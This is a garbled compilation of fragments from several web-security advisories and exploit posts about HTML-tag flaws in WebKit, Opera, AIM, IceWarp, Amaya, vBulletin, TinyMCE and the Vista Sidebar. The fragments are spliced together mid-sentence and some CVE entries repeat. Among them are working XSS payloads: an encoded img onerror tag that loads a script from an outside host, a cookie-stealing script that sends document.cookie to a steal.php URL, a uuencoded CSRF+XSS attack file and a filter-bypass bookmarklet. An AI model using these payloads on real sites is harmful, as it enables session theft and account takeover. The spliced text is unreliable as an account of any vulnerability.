HTML tag
Use-after-free vulnerability in WebKit, as used in Apple Safari
before 4.0, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1
through 2.2.1, Google Chrome 1.0.154.53, and possibly other products,
allows remote attackers to execute arbitrary code or cause a denial
of service (memory corruption and application crash) by setting an
unspecified property of an HTML tag that causes child elements to
be freed and later accessed when an HTML error occurs, related to
recursion in certain DOM event handlers. (CVE-2009-1690).
WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1,
and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a
CVE-2009-1690
Use-after-free vulnerability in WebKit, allows remote attackers to execute
arbitrary code or cause a denial of service (memory corruption and application
crash) by setting an unspecified property of an HTML tag that causes child
elements to be freed and later accessed when an HTML error occurs, related to
"recursion in certain DOM event handlers."
CVE-2009-1698
So, if you find a way to execute your malicious javascript in the feed
subscription page, you can essentially execute native opera functions and
ultimately use it to control the Victim's Opera browser. It looks like
Opera's Team did think about the implications of putting untrusted user
content in this page and hence only permitted a certain whitelist of html
tags. In addition, for some html tags such as "A" and "IMG", it required a
certain precondition to be met. See the code snippets captured using Opera
inbuilt debugger DragonFly (you can also use Firebug lite).
Whitelisted HTML Tags Definition - Opera Feed Subscription Page (Source -
DragonFly)
not have the sender focused within their AIM client. When sending a
message to an AIM user who does not have the sender focused in their AIM
client, a notification window will pop up informing the recipient that
they have just received a message from another AIM user. It is this
application in the AIM 6.x clients that is not properly parsing the
messages for this type of html tag and pops up an alert window." The
other public problems pointed out by Core posted in AOL's message boards
are not caused by AIM clients. AIM client 6.5.3.12 (currently in Beta)
fixes the reported problems and is available for public download (and for
testing). AOL remains unsuccessful trying to verify that the serverside
filtering mechanism can be bypassed and requests additional data (exact
V. DETECTION
Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to form an HTML tag.
In some cases single (') or double quotes (") are required to inject the
code into a given HTML statement. Some implementations of security systems
also look for well-known attack tags such as <script> and attack
attributes such as onMouseOver. However, these are usually not capable of
identifying highly optimized payloads.
More Details
============
To prevent the execution of JavaScript and VBScript code in HTML emails
and to remove unwanted HTML tags, the IceWarp WebMail Server filters HTML
emails with the function cleanHTML() that is defined in the PHP file
html/webmail/server/inc/tools.php
This filtering function can be circumvented in various ways, to still
In detail, the following flaw was determined:
- Safari fails to sanitize the file protocol handler, thus leading to an
information disclosure, e.g. local file theft.
Creating dynamically a certain HTML tag and using a valid file path to
an executable may lead to a Denial of Service condition.
Impact
Multiple stack buffer overflow vulnerabilities have been discovered in
Amaya web editor/browser [1], which can be exploited by unauthorized
people using crafted web pages to compromise a user's system.
A boundary error when processing 'input' HTML tags can be exploited to
cause a stack-based buffer overflow via an overly long 'type' parameter
(Bugtraq ID 33046). Code analysis of the Amaya XHTML parser reveals
multiple unchecked buffers declared on the stack, one of which is used
in the function 'EndOfXmlAttributeValue()':
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
###### CUT HERE ######
It's easy to see that "user_colors[bg_color]" is not validated and is used directly inside an echo function.
By sending a trivial HTTP request against PHP environments with register globals ON, it is possible to exploit this unvalidated user input flaw.
In detail, it is necessary to append a closing HTML tag </style> before the malicious JavaScript code.
The same problem arises at different points of the same script, for each different theme template:
background-color: #<?php echo( $user_colors[ 'bg_color' ] ); ?>;
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
-----------------
malicious file name:
<img src='' onerror='document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99,111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))'>
That <img> generates this HTML tag, which makes the browser load and execute an external script:
<script src=http://ilmuhacking.com/x.js></script>
That PoC exploit works for both file manager applications (standard and legacy).
A vulnerability exists within vBulletin which makes an attacker able to inject
code such as HTML or Javascript via custom BBCode Tags IF they follow certain
conditions which are described below.
Requirements:
- User input must be located inside a variable in an HTML tag.
- Apostrophes or nothing must be used for encapsulation.
Insecure Implementations:
---
[*] CSRF + XSS:
This is another way to exploit those two types of attacks (XSS and CSRF). If the administrator sees
this page, a new folder will be created whose name is a special HTML tag containing a
JavaScript script. (uuencoded)
+++
begin 644 attack.html
M/&AT;6P^"CQB;V1Y/@H)/&@Q/E!H;W)U;2`U+C(N,3`@(FYE=V9O;&1E<B(@
There are 2 ways to exploit this page
1. Type "javascript:(function(){var x = document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display = 'block';x.parentNode.removeChild (x);})()" on address bar and press Enter
2. Disable JavaScript in your browser and visit the vulnerable page.
Both methods above remove the TinyMCE filter; after that you can insert any script or HTML tag in your entry :D
--- Exploit (Grabbing Cookies)---
Simple Attack: <script>document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>
Remote exploitation of a Cross Site Scripting (XSS) vulnerability in the
Windows Vista Sidebar RSS Gadget allows an attacker to execute arbitrary
code with the privileges of the logged in user.
The vulnerability exists within the parsing of certain elements of
the items in an RSS feed. A properly crafted HTML tag within these
elements will not be removed, and will be rendered by the RSS gadget.
Since the RSS gadget runs in the local zone, the injected JavaScript
has full access to the system.
III. ANALYSIS
CVE-2009-1690
Use-after-free vulnerability in WebKit, as used in qt4-x11, allows remote
attackers to execute arbitrary code or cause a denial of service (memory
corruption and application crash) by setting an unspecified property of
an HTML tag that causes child elements to be freed and later accessed
when an HTML error occurs.
CVE-2009-1698